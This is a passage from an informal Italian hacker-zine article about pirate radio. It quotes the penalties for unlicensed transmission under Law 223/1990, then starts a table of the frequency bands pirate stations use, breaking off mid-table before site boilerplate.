l'articolo 195 della legge no. 223 del 06/08/1990, ovvero una parte della
famigerata "Legge Mammi'", attuale legge coordinante le attivita'
radiotelevisive.

Qui di seguito l'articolo 195 preso dalla Gazzetta Ufficiale.

===COPIA & INCOLLA===

Legge nr.223 <<Disciplina del sistema radiotelevisivo pubblico e privato>> del
06/08/1990 art.195 (Installazione ed esercizio di impianti di
telecomunicazione senza concessione od autorizzazione -Sanzioni)

1) Chiunque installa od esercita un impianto di telecomunicazione senza aver
ottenuto la relativa concessione o autorizzazione e' punito,[se il fatto
non costituisce reato], con la sanzione amministrativa pecuniaria da lire
500.000 a lire 20.000.000.

2) Se il fatto riguarda impianti radioelettrici, si applica la pena
dell'arresto da 3(tre) a 6(sei) mesi.

===COPIA & INCOLLA===

Bella legge vero? ;-)

(Se il fatto non costituisce reato?)

Cio' vuol dire che non si interferisce e/o disturba le altre trasmissioni
regolarmente autorizzate.
Dal momento che si va a disturbare una qualunque emittente radiofonica
autorizzata, cioe' dal momento che il fatto costituisce reato, la pena cambia
da una semplice multa al sequestro delle apparecchiature, fino ad arrivare
alla reclusione.


-[ fReQUenZe e m0dUlAzI0ni ]-

Ora vi chiederete: "E su quali frequenze devo trasmettere?". Ci sono molte
possibilita' di scelta, a seconda della potenza del'impianto, del tipo di
emissione (nazionale, internazionale, locale...), della "raison d'etre", e
soprattutto in base a quanto tempo si vuole campare nell'etere...

-[ s0lEnNe gRaTtAta dI mAr0nESS!!!! ;*) ]-

Pressapoco tutte le emittenti pirata, o free radios (d'ora in poi nominate FR)
hanno trasmesso a partire dal 1958, e tuttora trasmettono in 3 bande di
frequenza differenti, ed in due tipi di modulazione.

Ecco a voi una semplice tabella delle frequenze e modulazioni utilizzate per
le FR.

+----+----------+-------+-------+---+-----+
|SIG.|TIPO ONDE |F iniz.|F fin. |mt.|MOD. |
+----+----------+-------+-------+---+-----+
| MF | Medie | 561kHz|1800kHz|100| AM |->PoRtata INTERNAZIONALE<-
+-----------------------------------------+
| HF | Corte |3001kHz|6000Khz| 10| AM |->PoRtata INTERNAZIONALE<-
+-----------------------------------------+
|UHF |Ultracorte|* 88mHz|*108mHz| 3| FM |->PoRtata LOCALE/NAZIONALE<-
+----+----------+-------+-------+---+-----+
|SIG.= Sigla Gammma |
|F iniz.= Frequenza Iniziale |
|F fin.= Frequenza final

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT